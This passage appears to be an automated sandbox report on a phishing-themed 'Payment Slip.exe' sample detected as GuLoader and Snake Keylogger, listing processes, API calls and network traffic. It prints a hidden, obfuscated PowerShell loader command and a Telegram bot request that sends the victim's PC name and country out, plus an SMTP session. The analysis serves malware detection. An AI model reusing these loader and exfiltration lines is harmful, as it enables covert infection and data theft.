2024-07-25 08:06:02 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:06:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49733	149.154.167.220	443	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:06:02 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-07-25 08:06:03 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 08:06:02 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-25 08:06:03 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 25, 2024 10:06:10.481323957 CEST	587	49734	66.29.159.53	192.168.2.5	220 PrivateEmail.com prod Mail Node
Jul 25, 2024 10:06:10.481558084 CEST	49734	587	192.168.2.5	66.29.159.53	EHLO 374653
Jul 25, 2024 10:06:10.736872911 CEST	587	49734	66.29.159.53	192.168.2.5	250-mta-09.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-CHUNKING 250 STARTTLS
Jul 25, 2024 10:06:10.737097025 CEST	49734	587	192.168.2.5	66.29.159.53	STARTTLS
Jul 25, 2024 10:06:10.896609068 CEST	587	49734	66.29.159.53	192.168.2.5	220 Ready to start TLS

Target ID:	0
Start time:	04:04:06
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\Payment Slip.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment Slip.exe"
Imagebase:	0x400000
File size:	874'096 bytes
MD5 hash:	DB9B31DA65D0EF913176D54CEB4CF5F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:04:09
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
Imagebase:	0x9e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2679871550.00000000095F2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:04:09
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:04:58
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\Masculinity.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Masculinity.exe"
Imagebase:	0x400000
File size:	874'096 bytes
MD5 hash:	DB9B31DA65D0EF913176D54CEB4CF5F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.1%
Total number of Nodes:	1283
Total number of Limit Nodes:	35

Executed Functions

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNELBASE(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Payment Slip.exe",00000000), ref: 004033D9
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Payment Slip.exe",00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
DeleteFileW.KERNELBASE(1033), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040364B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Payment Slip.exe",00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ",?), ref: 004036C4
CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

Error launching installer, xrefs: 004035D6
\Temp, xrefs: 00403520
"C:\Users\user\Desktop\Payment Slip.exe", xrefs: 004033CC, 004033D2, 00403593
C:\Users\user\AppData\Local\Temp\, xrefs: 004034FE, 00403503, 00403519, 00403525, 00403534, 00403541, 0040354D, 00403555, 0040364A, 00403656, 00403662, 00403669, 0040371A
~nsu.tmp, xrefs: 00403645
TEMP, xrefs: 0040354E
SeShutdownPrivilege, xrefs: 0040376D
NSIS Error, xrefs: 004033B7
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B
C:\Users\user\Desktop, xrefs: 00403650, 00403655, 00403679
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 004035FC
';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", xrefs: 00403688
Low, xrefs: 0040353C
1033, xrefs: 0040356A
TMP, xrefs: 00403556
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 004034EE, 004035F1, 00403670, 0040367A

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\Payment Slip.exe"$';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-1245531394
Opcode ID: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

{, xrefs: 00405539

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00405F0A Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131

Strings

';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", xrefs: 00406104
Completed, xrefs: 00405F2F
: Completed, xrefs: 00405F34, 00406014, 00406035, 0040604A, 0040605D, 00406079, 004060A4, 004060D6, 004060DC, 004060F6, 0040610A, 0040612A, 00406130, 0040613C, 0040616F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: ';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1253520087
Opcode ID: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment Slip.exe"), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E1
lstrcatW.KERNEL32(?,00409014), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment Slip.exe"), ref: 0040580A
FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment Slip.exe"), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

\*.*, xrefs: 004057DB
"C:\Users\user\Desktop\Payment Slip.exe", xrefs: 00405779
C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Payment Slip.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1814209626
Opcode ID: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
GetProcAddress.KERNEL32(00000000,?), ref: 00406280

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
